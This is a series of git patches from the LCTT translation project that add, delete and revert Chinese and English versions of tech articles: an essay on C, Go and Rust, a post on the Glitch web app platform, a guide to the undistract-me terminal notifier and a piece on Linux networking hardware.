语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了类 C 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。 + +另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python 就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。 + +今天我们在 2017 年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。 + +即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。 + +我们现在已经知道了两件十分重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。 + +这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。 + +当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前 20 名,在 PYPL 指数上它的成就也比 Go 差很多。 + +五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。 + +在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。 + +-------------------------------------------------------------------------------- + +via: http://esr.ibiblio.org/?p=7745 + +作者:[Eric Raymond][a] +译者:[Valoniakim](https://github.com/Valoniakim) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://esr.ibiblio.org/?author=2 +[1]:http://esr.ibiblio.org/?author=2 +[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931 +[3]:http://esr.ibiblio.org/?p=7745 From 01dcb3137581c8f23b9f6377e584d5180958775f Mon Sep 17 00:00:00 2001 From: Sihua Zheng Date: Wed, 6 Dec 2017 09:20:11 +0800 Subject: [PATCH 0329/1627] translated --- ... write fun small web projects instantly.md | 76 ------------------- ... write fun small web projects instantly.md | 73 ++++++++++++++++++ 2 files changed, 73 insertions(+), 76 deletions(-) delete mode 100644 sources/tech/20171113 Glitch write fun small web projects instantly.md create mode 100644 translated/tech/20171113 Glitch write fun small web projects instantly.md diff --git a/sources/tech/20171113 Glitch write fun small web projects instantly.md b/sources/tech/20171113 Glitch write fun small web projects instantly.md deleted file mode 100644 index 734853ce51..0000000000 --- a/sources/tech/20171113 Glitch write fun small web projects instantly.md +++ /dev/null @@ -1,76 +0,0 @@ -translating---geekpi - -Glitch: write fun small web projects instantly -============================================================ - -I just wrote about Jupyter Notebooks which are a fun interactive way to write Python code. That reminded me I learned about Glitch recently, which I also love!! I built a small app to [turn of twitter retweets][2] with it. So! - -[Glitch][3] is an easy way to make Javascript webapps. (javascript backend, javascript frontend) - -The fun thing about glitch is: - -1. you start typing Javascript code into their web interface - -2. as soon as you type something, it automagically reloads the backend of your website with the new code. You don’t even have to save!! It autosaves. - -So it’s like Heroku, but even more magical!! Coding like this (you type, and the code runs on the public internet immediately) just feels really **fun** to me. - -It’s kind of like sshing into a server and editing PHP/HTML code on your server and having it instantly available, which I kind of also loved. Now we have “better deployment practices” than “just edit the code and it is instantly on the internet” but we are not talking about Serious Development Practices, we are talking about writing tiny programs for fun. - -### glitch has awesome example apps - -Glitch seems like fun nice way to learn programming! - -For example, there’s a space invaders game (code by [Mary Rose Cook][4]) at [https://space-invaders.glitch.me/][5]. The thing I love about this is that in just a few clicks I can - -1. click “remix this” - -2. start editing the code to make the boxes orange instead of black - -3. have my own space invaders game!! Mine is at [http://julias-space-invaders.glitch.me/][1]. (i just made very tiny edits to make it orange, nothing fancy) - -They have tons of example apps that you can start from – for instance [bots][6], [games][7], and more. - -### awesome actually useful app: tweetstorms - -The way I learned about Glitch was from this app which shows you tweetstorms from a given user: [https://tweetstorms.glitch.me/][8]. - -For example, you can see [@sarahmei][9]’s tweetstorms at [https://tweetstorms.glitch.me/sarahmei][10] (she tweets a lot of good tweetstorms!). - -### my glitch app: turn off retweets - -When I learned about Glitch I wanted to turn off retweets for everyone I follow on Twitter (I know you can do it in Tweetdeck!) and doing it manually was a pain – I had to do it one person at a time. So I wrote a tiny Glitch app to do it for me! - -I liked that I didn’t have to set up a local development environment, I could just start typing and go! - -Glitch only supports Javascript and I don’t really know Javascript that well (I think I’ve never written a Node program before), so the code isn’t awesome. But I had a really good time writing it – being able to type and just see my code running instantly was delightful. Here it is: [https://turn-off-retweets.glitch.me/][11]. - -### that’s all! - -Using Glitch feels really fun and democratic. Usually if I want to fork someone’s web project and make changes I wouldn’t do it – I’d have to fork it, figure out hosting, set up a local dev environment or Heroku or whatever, install the dependencies, etc. I think tasks like installing node.js dependencies used to be interesting, like “cool i am learning something new” and now I just find them tedious. - -So I love being able to just click “remix this!” and have my version on the internet instantly. - - --------------------------------------------------------------------------------- - -via: https://jvns.ca/blog/2017/11/13/glitch--write-small-web-projects-easily/ - -作者:[Julia Evans ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jvns.ca/ -[1]:http://julias-space-invaders.glitch.me/ -[2]:https://turn-off-retweets.glitch.me/ -[3]:https://glitch.com/ -[4]:https://maryrosecook.com/ -[5]:https://space-invaders.glitch.me/ -[6]:https://glitch.com/handy-bots -[7]:https://glitch.com/games -[8]:https://tweetstorms.glitch.me/ -[9]:https://twitter.com/sarahmei -[10]:https://tweetstorms.glitch.me/sarahmei -[11]:https://turn-off-retweets.glitch.me/ diff --git a/translated/tech/20171113 Glitch write fun small web projects instantly.md b/translated/tech/20171113 Glitch write fun small web projects instantly.md new file mode 100644 index 0000000000..fde7d7f880 --- /dev/null +++ b/translated/tech/20171113 Glitch write fun small web projects instantly.md @@ -0,0 +1,73 @@ +Glitch:立即写出有趣的小型网站项目 +============================================================ + +我刚写了一篇关于 Jupyter Notebooks 是一个有趣的交互式写 Python 代码的方式。这让我想起我最近学习了 Glitch,这个我同样喜爱!我构建了一个小的程序来用于[关闭转发 twitter][2]。因此有了这篇文章! + +[Glitch][3] 是一个简单的构建 Javascript web 程序的方式(javascript 后端、javascript 前端) + +关于 glitch 有趣的事有: + +1. 你在他们的网站输入 Javascript 代码 + +2. 只要输入了任何代码,它会自动用你的新代码重载你的网站。你甚至不必保存!它会自动保存。 + +所以这就像 Heroku,但更神奇!像这样的编码(你输入代码,代码立即在公共网络上运行)对我而言感觉很**有趣**。 + +这有点像 ssh 登录服务器,编辑服务器上的 PHP/HTML 代码,并让它立即可用,这也是我所喜爱的。现在我们有了“更好的部署实践”,而不是“编辑代码,它立即出现在互联网上”,但我们并不是在谈论严肃的开发实践,而是在讨论编写微型程序的乐趣。 + +### Glitch 有很棒的示例应用程序 + +Glitch 似乎是学习编程的好方式! + +比如,这有一个太空侵略者游戏(由 [Mary Rose Cook][4] 编写):[https://space-invaders.glitch.me/][5]。我喜欢的是我只需要点击几下。 + +1. 点击 “remix this” + +2. 开始编辑代码使箱子变成橘色而不是黑色 + +3. 制作我自己太空侵略者游戏!我的在这:[http://julias-space-invaders.glitch.me/][1]。(我只做了很小的更改使其变成橘色,没什么神奇的) + +他们有大量的示例程序,你可以从中启动 - 例如[机器人][6]、[游戏][7]等等。 + +### 实际有用的非常好的程序:tweetstorms + +我学习 Glitch 的方式是从这个程序:[https://tweetstorms.glitch.me/][8],它会向你展示给定用户的 tweetstorm。 + +比如,你可以在 [https://tweetstorms.glitch.me/sarahmei][10] 看到 [@sarahmei][9] 的 tweetstorm(她发布了很多好的 tweetstorm!)。 + +### 我的 Glitch 程序: 关闭转推 + +当我了解到 Glitch 的时候,我想关闭在 Twitter 上关注的所有人的转推(我知道可以在 Tweetdeck 中做这件事),而且手动做这件事是一件很痛苦的事 - 我一次只能设置一个人。所以我写了一个 Glitch 程序来为我做! + +我喜欢我不必设置一个本地开发环境,我可以直接开始输入然后开始! + +Glitch 只支持 Javascript,我不非常了解 Javascript(我之前从没写过一个 Node 程序),所以代码不是很好。但是编写它很愉快 - 能够输入并立即看到我的代码运行是令人愉快的。这是我的项目:[https://turn-off-retweets.glitch.me/][11]。 + +### 就是这些! + +使用 Glitch 感觉真的很有趣和民主。通常情况下,如果我想 fork 某人的 Web 项目,并做出更改,我不会这样做 - 我必须 fork,找一个托管,设置本地开发环境或者 Heroku 或其他,安装依赖项等。我认为像安装 node.js 依赖关系这样的任务过去很有趣,就像“我正在学习新东西很酷”,现在我觉得它们很乏味。 + +所以我喜欢只需点击 “remix this!” 并立即在互联网上能有我的版本。 + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/11/13/glitch--write-small-web-projects-easily/ + +作者:[Julia Evans ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/ +[1]:http://julias-space-invaders.glitch.me/ +[2]:https://turn-off-retweets.glitch.me/ +[3]:https://glitch.com/ +[4]:https://maryrosecook.com/ +[5]:https://space-invaders.glitch.me/ +[6]:https://glitch.com/handy-bots +[7]:https://glitch.com/games +[8]:https://tweetstorms.glitch.me/ +[9]:https://twitter.com/sarahmei +[10]:https://tweetstorms.glitch.me/sarahmei +[11]:https://turn-off-retweets.glitch.me/ From 042a92d63f97636d7e760bbdc464a6d7d8053167 Mon Sep 17 00:00:00 2001 From: root Date: Wed, 6 Dec 2017 09:45:43 +0800 Subject: [PATCH 0330/1627] rename --- ...Long Running Terminal Commands Complete.md | 156 ------------------ 1 file changed, 156 deletions(-) delete mode 100644 sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md diff --git a/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md b/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md deleted file mode 100644 index 46afe9b893..0000000000 --- a/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md +++ /dev/null @@ -1,156 +0,0 @@ -translating---geekpi - -Undistract-me : Get Notification When Long Running Terminal Commands Complete -============================================================ - -by [sk][2] · November 30, 2017 - -![Undistract-me](https://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2-720x340.png) - -A while ago, we published how to [get notification when a Terminal activity is done][3]. Today, I found out a similar utility called “undistract-me” that notifies you when long running terminal commands complete. Picture this scenario. You run a command that takes a while to finish. In the mean time, you check your facebook and get so involved in it. After a while, you remembered that you ran a command few minutes ago. You go back to the Terminal and notice that the command has already finished. But you have no idea when the command is completed. Have you ever been in this situation? I bet most of you were in this situation many times. This is where “undistract-me” comes in help. You don’t need to constantly check the terminal to see if a command is completed or not. Undistract-me utility will notify you when a long running command is completed. It will work on Arch Linux, Debian, Ubuntu and other Ubuntu-derivatives. - -#### Installing Undistract-me - -Undistract-me is available in the default repositories of Debian and its variants such as Ubuntu. All you have to do is to run the following command to install it. - -``` -sudo apt-get install undistract-me -``` - -The Arch Linux users can install it from AUR using any helper programs. - -Using [Pacaur][4]: - -``` -pacaur -S undistract-me-git -``` - -Using [Packer][5]: - -``` -packer -S undistract-me-git -``` - -Using [Yaourt][6]: - -``` -yaourt -S undistract-me-git -``` - -Then, run the following command to add “undistract-me” to your Bash. - -``` -echo 'source /etc/profile.d/undistract-me.sh' >> ~/.bashrc -``` - -Alternatively you can run this command to add it to your Bash: - -``` -echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .bashrc -``` - -If you are in Zsh shell, run this command: - -``` -echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .zshrc -``` - -Finally update the changes: - -For Bash: - -``` -source ~/.bashrc -``` - -For Zsh: - -``` -source ~/.zshrc -``` - -#### Configure Undistract-me - -By default, Undistract-me will consider any command that takes more than 10 seconds to complete as a long-running command. You can change this time interval by editing /usr/share/undistract-me/long-running.bash file. - -``` -sudo nano /usr/share/undistract-me/long-running.bash -``` - -Find “LONG_RUNNING_COMMAND_TIMEOUT” variable and change the default value (10 seconds) to something else of your choice. - - [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png)][7] - -Save and close the file. Do not forget to update the changes: - -``` -source ~/.bashrc -``` - -Also, you can disable notifications for particular commands. To do so, find the “LONG_RUNNING_IGNORE_LIST” variable and add the commands space-separated like below. - -By default, the notification will only show if the active window is not the window the command is running in. That means, it will notify you only if the command is running in the background Terminal window. If the command is running in active window Terminal, you will not be notified. If you want undistract-me to send notifications either the Terminal window is visible or in the background, you can set IGNORE_WINDOW_CHECK to 1 to skip the window check. - -The other cool feature of Undistract-me is you can set audio notification along with visual notification when a command is done. By default, it will only send a visual notification. You can change this behavior by setting the variable UDM_PLAY_SOUND to a non-zero integer on the command line. However, your Ubuntu system should have pulseaudio-utils and sound-theme-freedesktop utilities installed to enable this functionality. - -Please remember that you need to run the following command to update the changes made. - -For Bash: - -``` -source ~/.bashrc -``` - -For Zsh: - -``` -source ~/.zshrc -``` - -It is time to verify if this really works. - -#### Get Notification When Long Running Terminal Commands Complete - -Now, run any command that takes longer than 10 seconds or the time duration you defined in Undistract-me script. - -I ran the following command on my Arch Linux desktop. - -``` -sudo pacman -Sy -``` - -This command took 32 seconds to complete. After the completion of the above command, I got the following notification. - - [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png)][8] - -Please remember Undistract-me script notifies you only if the given command took more than 10 seconds to complete. If the command is completed in less than 10 seconds, you will not be notified. Of course, you can change this time interval settings as I described in the Configuration section above. - -I find this tool very useful. It helped me to get back to the business after I completely lost in some other tasks. I hope this tool will be helpful to you too. - -More good stuffs to come. Stay tuned! - -Cheers! - -Resource: - -* [Undistract-me GitHub Repository][1] - --------------------------------------------------------------------------------- - -via: https://www.ostechnix.com/undistract-get-notification-long-running-terminal-commands-complete/ - -作者:[sk][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.ostechnix.com/author/sk/ -[1]:https://github.com/jml/undistract-me -[2]:https://www.ostechnix.com/author/sk/ -[3]:https://www.ostechnix.com/get-notification-terminal-task-done/ -[4]:https://www.ostechnix.com/install-pacaur-arch-linux/ -[5]:https://www.ostechnix.com/install-packer-arch-linux-2/ -[6]:https://www.ostechnix.com/install-yaourt-arch-linux/ -[7]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png -[8]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png From 675e5cf6af6f303e757912ac0751b7d09684d4bf Mon Sep 17 00:00:00 2001 From: "Xingyu.Wang" Date: Wed, 6 Dec 2017 09:55:46 +0800 Subject: [PATCH 0331/1627] Revert "merge" --- ... write fun small web projects instantly.md | 76 ++++++++ ...actices for getting started with DevOps.md | 95 --------- ...g Hardware for Beginners Think Software.md | 89 --------- ... write fun small web projects instantly.md | 73 ------- ...ow to Manage Users with Groups in Linux.md | 183 ------------------ 5 files changed, 76 insertions(+), 440 deletions(-) create mode 100644 sources/tech/20171113 Glitch write fun small web projects instantly.md delete mode 100644 sources/tech/20171129 5 best practices for getting started with DevOps.md delete mode 100644 translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md delete mode 100644 translated/tech/20171113 Glitch write fun small web projects instantly.md delete mode 100644 translated/tech/20171201 How to Manage Users with Groups in Linux.md diff --git a/sources/tech/20171113 Glitch write fun small web projects instantly.md b/sources/tech/20171113 Glitch write fun small web projects instantly.md new file mode 100644 index 0000000000..734853ce51 --- /dev/null +++ b/sources/tech/20171113 Glitch write fun small web projects instantly.md @@ -0,0 +1,76 @@ +translating---geekpi + +Glitch: write fun small web projects instantly +============================================================ + +I just wrote about Jupyter Notebooks which are a fun interactive way to write Python code. That reminded me I learned about Glitch recently, which I also love!! I built a small app to [turn of twitter retweets][2] with it. So! + +[Glitch][3] is an easy way to make Javascript webapps. (javascript backend, javascript frontend) + +The fun thing about glitch is: + +1. you start typing Javascript code into their web interface + +2. as soon as you type something, it automagically reloads the backend of your website with the new code. You don’t even have to save!! It autosaves. + +So it’s like Heroku, but even more magical!! Coding like this (you type, and the code runs on the public internet immediately) just feels really **fun** to me. + +It’s kind of like sshing into a server and editing PHP/HTML code on your server and having it instantly available, which I kind of also loved. Now we have “better deployment practices” than “just edit the code and it is instantly on the internet” but we are not talking about Serious Development Practices, we are talking about writing tiny programs for fun. + +### glitch has awesome example apps + +Glitch seems like fun nice way to learn programming! + +For example, there’s a space invaders game (code by [Mary Rose Cook][4]) at [https://space-invaders.glitch.me/][5]. The thing I love about this is that in just a few clicks I can + +1. click “remix this” + +2. start editing the code to make the boxes orange instead of black + +3. have my own space invaders game!! Mine is at [http://julias-space-invaders.glitch.me/][1]. (i just made very tiny edits to make it orange, nothing fancy) + +They have tons of example apps that you can start from – for instance [bots][6], [games][7], and more. + +### awesome actually useful app: tweetstorms + +The way I learned about Glitch was from this app which shows you tweetstorms from a given user: [https://tweetstorms.glitch.me/][8]. + +For example, you can see [@sarahmei][9]’s tweetstorms at [https://tweetstorms.glitch.me/sarahmei][10] (she tweets a lot of good tweetstorms!). + +### my glitch app: turn off retweets + +When I learned about Glitch I wanted to turn off retweets for everyone I follow on Twitter (I know you can do it in Tweetdeck!) and doing it manually was a pain – I had to do it one person at a time. So I wrote a tiny Glitch app to do it for me! + +I liked that I didn’t have to set up a local development environment, I could just start typing and go! + +Glitch only supports Javascript and I don’t really know Javascript that well (I think I’ve never written a Node program before), so the code isn’t awesome. But I had a really good time writing it – being able to type and just see my code running instantly was delightful. Here it is: [https://turn-off-retweets.glitch.me/][11]. + +### that’s all! + +Using Glitch feels really fun and democratic. Usually if I want to fork someone’s web project and make changes I wouldn’t do it – I’d have to fork it, figure out hosting, set up a local dev environment or Heroku or whatever, install the dependencies, etc. I think tasks like installing node.js dependencies used to be interesting, like “cool i am learning something new” and now I just find them tedious. + +So I love being able to just click “remix this!” and have my version on the internet instantly. + + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/11/13/glitch--write-small-web-projects-easily/ + +作者:[Julia Evans ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/ +[1]:http://julias-space-invaders.glitch.me/ +[2]:https://turn-off-retweets.glitch.me/ +[3]:https://glitch.com/ +[4]:https://maryrosecook.com/ +[5]:https://space-invaders.glitch.me/ +[6]:https://glitch.com/handy-bots +[7]:https://glitch.com/games +[8]:https://tweetstorms.glitch.me/ +[9]:https://twitter.com/sarahmei +[10]:https://tweetstorms.glitch.me/sarahmei +[11]:https://turn-off-retweets.glitch.me/ diff --git a/sources/tech/20171129 5 best practices for getting started with DevOps.md b/sources/tech/20171129 5 best practices for getting started with DevOps.md deleted file mode 100644 index 7694180c14..0000000000 --- a/sources/tech/20171129 5 best practices for getting started with DevOps.md +++ /dev/null @@ -1,95 +0,0 @@ -translating---aiwhj -5 best practices for getting started with DevOps -============================================================ - -### Are you ready to implement DevOps, but don't know where to begin? Try these five best practices. - - -![5 best practices for getting started with DevOps](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/devops-gears.png?itok=rUejbLQX "5 best practices for getting started with DevOps") -Image by :  - -[Andrew Magill][8]. Modified by Opensource.com. [CC BY 4.0][9] - -DevOps often stymies early adopters with its ambiguity, not to mention its depth and breadth. By the time someone buys into the idea of DevOps, their first questions usually are: "How do I get started?" and "How do I measure success?" These five best practices are a great road map to starting your DevOps journey. - -### 1\. Measure all the things - -You don't know for sure that your efforts are even making things better unless you can quantify the outcomes. Are my features getting out to customers more rapidly? Are fewer defects escaping to them? Are we responding to and recovering more quickly from failure? - -Before you change anything, think about what kinds of outcomes you expect from your DevOps transformation. When you're further into your DevOps journey, you'll enjoy a rich array of near-real-time reports on everything about your service. But consider starting with these two metrics: - -* **Time to market** measures the end-to-end, often customer-facing, business experience. It usually begins when a feature is formally conceived and ends when the customer can consume the feature in production. Time to market is not mainly an engineering team metric; more importantly it shows your business' complete end-to-end efficiency in bringing valuable new features to market and isolates opportunities for system-wide improvement. - -* **Cycle time** measures the engineering team process. Once work on a new feature starts, when does it become available in production? This metric is very useful for understanding the efficiency of the engineering team and isolating opportunities for team-level improvement. - -### 2\. Get your process off the ground - -DevOps success requires an organization to put a regular (and hopefully effective) process in place and relentlessly improve upon it. It doesn't have to start out being effective, but it must be a regular process. Usually that it's some flavor of agile methodology like Scrum or Scrumban; sometimes it's a Lean derivative. Whichever way you go, pick a formal process, start using it, and get the basics right. - -Regular inspect-and-adapt behaviors are key to your DevOps success. Make good use of opportunities like the stakeholder demo, team retrospectives, and daily standups to find opportunities to improve your process. - -A lot of your DevOps success hinges on people working effectively together. People on a team need to work from a common process that they are empowered to improve upon. They also need regular opportunities to share what they are learning with other stakeholders, both upstream and downstream, in the process. - -Good process discipline will help your organization consume the other benefits of DevOps at the great speed that comes as your success builds. - -Although it's common for more development-oriented teams to successfully adopt processes like Scrum, operations-focused teams (or others that are more interrupt-driven) may opt for a process with a more near-term commitment horizon, such as Kanban. - -### 3\. Visualize your end-to-end workflow - -There is tremendous power in being able to see who's working on what part of your service at any given time. Visualizing your workflow will help people know what they need to work on next, how much work is in progress, and where the bottlenecks are in the process. - -You can't effectively limit work in process until you can see it and quantify it. Likewise, you can't effectively eliminate bottlenecks until you can clearly see them. - -Visualizing the entire workflow will help people in all parts of the organization understand how their work contributes to the success of the whole. It can catalyze relationship-building across organizational boundaries to help your teams collaborate more effectively towards a shared sense of success. - -### 4\. Continuous all the things - -DevOps promises a dizzying array of compelling automation. But Rome wasn't built in a day. One of the first areas you can focus your efforts on is [continuous integration][10] (CI). But don't stop there; you'll want to follow quickly with [continuous delivery][11] (CD) and eventually continuous deployment. - -Your CD pipeline is your opportunity to inject all manner of automated quality testing into your process. The moment new code is committed, your CD pipeline should run a battery of tests against the code and the successfully built artifact. The artifact that comes out at the end of this gauntlet is what progresses along your process until eventually it's seen by customers in production. - -Another "continuous" that doesn't get enough attention is continuous improvement. That's as simple as setting some time aside each day to ask your colleagues: "What small thing can we do today to get better at how we do our work?" These small, daily changes compound over time into more profound results. You'll be pleasantly surprised! But it also gets people thinking all the time about how to improve things. - -### 5\. Gherkinize - -Fostering more effective communication across your organization is crucial to fostering the sort of systems thinking prevalent in successful DevOps journeys. One way to help that along is to use a shared language between the business and the engineers to express the desired acceptance criteria for new features. A good product manager can learn [Gherkin][12] in a day and begin using it to express acceptance criteria in an unambiguous, structured form of plain English. Engineers can use this Gherkinized acceptance criteria to write acceptance tests against the criteria, and then develop their feature code until the tests pass. This is a simplification of [acceptance test-driven development][13](ATDD) that can also help kick start your DevOps culture and engineering practice. - -### Start on your journey - -Don't be discouraged by getting started with your DevOps practice. It's a journey. And hopefully these five ideas give you solid ways to get started. - - -### About the author - - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/headshot_4.jpg?itok=jntfDCfX)][14] - - Magnus Hedemark - Magnus has been in the IT industry for over 20 years, and a technology enthusiast for most of his life. He's presently Manager of DevOps Engineering at UnitedHealth Group. In his spare time, Magnus enjoys photography and paddling canoes. - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/5-keys-get-started-devops - -作者:[Magnus Hedemark ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/magnus919 -[1]:https://opensource.com/tags/devops?src=devops_resource_menu1 -[2]:https://opensource.com/resources/devops?src=devops_resource_menu2 -[3]:https://www.openshift.com/promotions/devops-with-openshift.html?intcmp=7016000000127cYAAQ&src=devops_resource_menu3 -[4]:https://enterprisersproject.com/article/2017/5/9-key-phrases-devops?intcmp=7016000000127cYAAQ&src=devops_resource_menu4 -[5]:https://www.redhat.com/en/insights/devops?intcmp=7016000000127cYAAQ&src=devops_resource_menu5 -[6]:https://opensource.com/article/17/11/5-keys-get-started-devops?rate=oEOzMXx1ghbkfl2a5ae6AnvO88iZ3wzkk53K2CzbDWI -[7]:https://opensource.com/user/25739/feed -[8]:https://ccsearch.creativecommons.org/image/detail/7qRx_yrcN5isTMS0u9iKMA== -[9]:https://creativecommons.org/licenses/by-sa/4.0/ -[10]:https://martinfowler.com/articles/continuousIntegration.html -[11]:https://martinfowler.com/bliki/ContinuousDelivery.html -[12]:https://cucumber.io/docs/reference -[13]:https://en.wikipedia.org/wiki/Acceptance_test%E2%80%93driven_development -[14]:https://opensource.com/users/magnus919 -[15]:https://opensource.com/users/magnus919 -[16]:https://opensource.com/users/magnus919 -[17]:https://opensource.com/tags/devops diff --git a/translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md b/translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md deleted file mode 100644 index a236a80e97..0000000000 --- a/translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md +++ /dev/null @@ -1,89 +0,0 @@ -Translating by FelixYFZ - -面向初学者的Linux网络硬件: 软件工程思想 -============================================================ - -![island network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/soderskar-island.jpg?itok=wiMaF66b "island network") - 没有路由和桥接,我们将会成为孤独的小岛,你将会在这个网络教程中学到更多知识。 -Commons Zero][3]Pixabay - - 上周,我们学习了本地网络硬件知识,本周,我们将学习网络互联技术和在移动网络中的一些很酷的黑客技术。 -### Routers:路由器 - - -网络路由器就是计算机网络中的一切,因为路由器连接着网络,没有路由器,我们就会成为孤岛, - -图一展示了一个简单的有线本地网络和一个无线接入点,所有设备都接入到Internet上,本地局域网的计算机连接到一个连接着防火墙或者路由器的以太网交换机上,防火墙或者路由器连接到网络服务供应商提供的电缆箱,调制调节器,卫星上行系统...好像一切都在计算中,就像是一个带着不停闪烁的的小灯的盒子,当你的网络数据包离开你的局域网,进入广阔的互联网,它们穿过一个又一个路由器直到到达自己的目的地。 - - -### [fig-1.png][4] - -![simple LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_7.png?itok=lsazmf3- "simple LAN") - -图一:一个简单的有线局域网和一个无线接入点。 - -一台路由器能连接一切,一个小巧特殊的小盒子只专注于路由,一个大点的盒子将会提供路由,防火墙,域名服务,以及VPN网关功能,一台重新设计的台式电脑或者笔记本,一个树莓派计算机或者一个小模块,体积臃肿矮小的像PC这样的单板计算机,除了苛刻的用途以外,普通的商品硬件都能良好的工作运行。高端的路由器使用特殊设计的硬件每秒能够传输最大量的数据包。 它们有多路数据总线,多个中央处理器和极快的存储。 -可以通过查阅Juniper和思科的路由器来感受一下高端路由器书什么样子的,而且能看看里面是什么样的构造。 -一个接入你的局域网的无线接入点要么作为一个以太网网桥要么作为一个路由器。一个桥接器扩展了这个网络,所以在这个桥接器上的任意一端口上的主机都连接在同一个网络中。 -一台路由器连接的是两个不同的网络。 -### Network Topology:网络拓扑 - - -有多种设置你的局域网的方式,你可以把所有主机接入到一个单独的平面网络,如果你的交换机支持的话,你也可以把它们分配到不同的子网中。 -平面网络是最简单的网络,只需把每一台设备接入到同一个交换机上即可,如果一台交换上的端口不够使用,你可以将更多的交换机连接在一起。 -有些交换机有特殊的上行端口,有些是没有这种特殊限制的上行端口,你可以连接其中的任意端口,你可能需要使用交叉类型的以太网线,所以你要查阅你的交换机的说明文档来设置。平面网络是最容易管理的,你不需要路由器也不需要计算子网,但它也有一些缺点。他们的伸缩性不好,所以当网络规模变得越来越大的时候就会被广播网络所阻塞。 -将你的局域网进行分段将会提升安全保障, 